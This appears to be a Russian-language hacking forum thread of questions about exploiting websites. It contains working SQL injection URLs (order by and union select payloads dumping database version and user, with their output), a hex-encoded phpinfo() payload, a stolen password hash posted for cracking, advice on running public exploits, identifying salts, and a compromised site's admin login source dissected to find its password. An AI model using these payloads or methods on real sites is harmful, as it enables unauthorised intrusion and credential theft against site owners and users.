Ваши вопросы по уязвимостям.

откудого ты подобрал эти символы ??
%20 это видимо пробле. а остальное ?


спасибо )

 

0x706870696e666f28293b=phpinfo();

 

Code:

http://site.ru//tv/?prn&ch=1&rubrics[]=1)+order+by+1--+
http://site.ru/tv/?prn&ch=1&rubrics[]=-1)+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11--+

5.0.22-log:xmlvlru:[email protected]:redhat-linux-gnu

 

народ вот есть много эксплойтов под разны уязвимости... в общем в чем вопрос: я когда сохраняю сплойт например на перл абсолютно не изменяя его ввожу в cmd cd C:\perl\bin
perl sploit.pl
нажимаю enter вроде должен запуститься но пишет ошибку синтаксиса, хз почему, в чем может быть проблема , и так со всеми сплойтами абсолютно, переустановка компилятора не помогла

 

neverdie
Это происходит потому, что в сплоитах с паблика очень часто НАМЕРЕННО сделаны ошибки, обычно мелкие синтаксические, для того, что-бы откровенные нубы не могли им воспользоваться.

Т.е: ищи ошибку , исправляй и юзай

PS Только не нужно сюда копипастить сплоит с просьбой найти ошибку, их не для этого там делают

 

хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)

 

Тогда тебе не повезло, учи перл...

 

короче не обессудьте,
вопрос
в форум о хешах не пишу, потому как молчат там все

насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ?
спрашиваю потому что хеши которые я выдрал из 4 версии имеют длину 40


и второй вопрос .

есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов .
но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и
2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается .

как мне нормально отсканировать сайт ? может в опциях указать что-нибудь

 

Здравствуйте , приятного времени суток

Достал пароль от accaunt'a (Sql-inje.. ) а он с salt.
Подскажите , где можно найти сам код salt'a , на сайте,в каких таблицах или kak он выглядит...
слышал что такое возможно )

 

16

Можно поточнее,от форума или откуда-нибудь ещё? И как определил что он с солью?

 

Скажите плз это реально расшифровать?

и чем это вообще зашифровано?

 

пароль от сайта
пробовал через этот сайт:
https://hashcracking.info/index.php

никаких результатов , поэтому и подумал что он с salt. 04b1abea6597fe097c29ca3aebd16584

Но проста , даже на будущее, kak узнать что это salt, где он может быть ,если это сайт или Форум.

 

Реально. MD5(Wordpress)
http://insidepro.com/hashes.php (здесь более 100 видов хешей)

 

mysql5 просто называется mysql5 поддерживается с mysql 4.1 и вобщето он 20 байт а mysql хеш 8 байт

 

ответьте кто-нибудь пожал.
или же дайте ссылку на тему где ответят (железно только)

 

Опции, с которыми ты запускаешь nmap можешь показать? Здесь можно почитать про nmap, про типы сканировани и про возможные ситуации.

 

У меня такой вопрос где может прятатся пароль от админик сайта, парол который есть в базе даных не подходит! админка писалась вручную есть исходник login.php

<?

include './../cfg.php';
include './../lib/macros.class.php';
include './../lib/mail.class.php';

$sql = "SELECT * FROM ".PREF."admin";
($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error());
$f = mysql_fetch_array($result);

$login = $f['login'];
$pwd = $f['pwd'];
$email = $f['mail'];
$message = '';

if(isset($_GET['action']) && $_GET['action'] == 'lost_pwd'){

$mail = new mime_mail;
$mail -> from = $_SERVER['HTTP_HOST'];
$mail -> to = $email;
$mail -> subject = "Забыли пароль";
$mail -> body = "Логин :$login\n".
"Пароль:$pwd\n";
// $mail -> print_message("text/plain");
$mail -> send("text/plain");
$message = "<b>Пароль и логин отправлены на Ваш EMail.</b>";
}

function set_values($login="", $password="", $url="") {

session_start();

global $HTTP_SESSION_VARS;

$HTTP_SESSION_VARS['login_admin'] = $login;
$HTTP_SESSION_VARS['password_admin'] = $password;

if ($url) {
header("Location: $url");
exit;
}
}

if (isset($_POST['login_admin']) && isset($_POST['password_admin'])) {

if ($_POST['login_admin']==$login && $_POST['password_admin']==$pwd) {
set_values($_POST['login_admin'], $_POST['password_admin'], "index.php");
}
else {

set_values();
$a = new Macros;
$a -> assign(array(
'MESSAGE' => $message
));
$a->define("templates/login.htm");
$a->parse(0);
print $a->fetch();
exit;
}

}

session_start();

if (isset($HTTP_SESSION_VARS['login_admin']) && isset($HTTP_SESSION_VARS['password_admin'])) {

if ($HTTP_SESSION_VARS['login_admin'] != $login && $HTTP_SESSION_VARS['password_admin']!=$pwd){

set_values();
$a = new Macros;
$a -> assign(array(
'MESSAGE' => $message
));
$a->define("templates/login.htm");
$a->parse(0);
print $a->fetch();
exit;
}

}

else {

set_values();
$a = new Macros;
$a -> assign(array(
'MESSAGE' => $message
));
$a->define("templates/login.htm");
$a->parse(0);
print $a->fetch();
exit;
}
?>

 

include './../cfg.php';
перейди на папку выше, там будет cfg.php, в нем возможно
upd. ой ступил, ему не это надо=(

 

Code:

$sql = "SELECT * FROM ".PREF."admin";
($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error());
$f = mysql_fetch_array($result);
$login = $f['login'];
$pwd = $f['pwd'];

вот тут (может ты не из той таблицы тянешь пасс ы?)
префикс таблицы скорее всего тут include './../cfg.php';

 

Там будет конфиг подключения к базе лежать...
Что разве не видишь запрос?

Code:

$sql = "SELECT * FROM ".PREF."admin"; 

Тут пароль полюбому..и больше никак..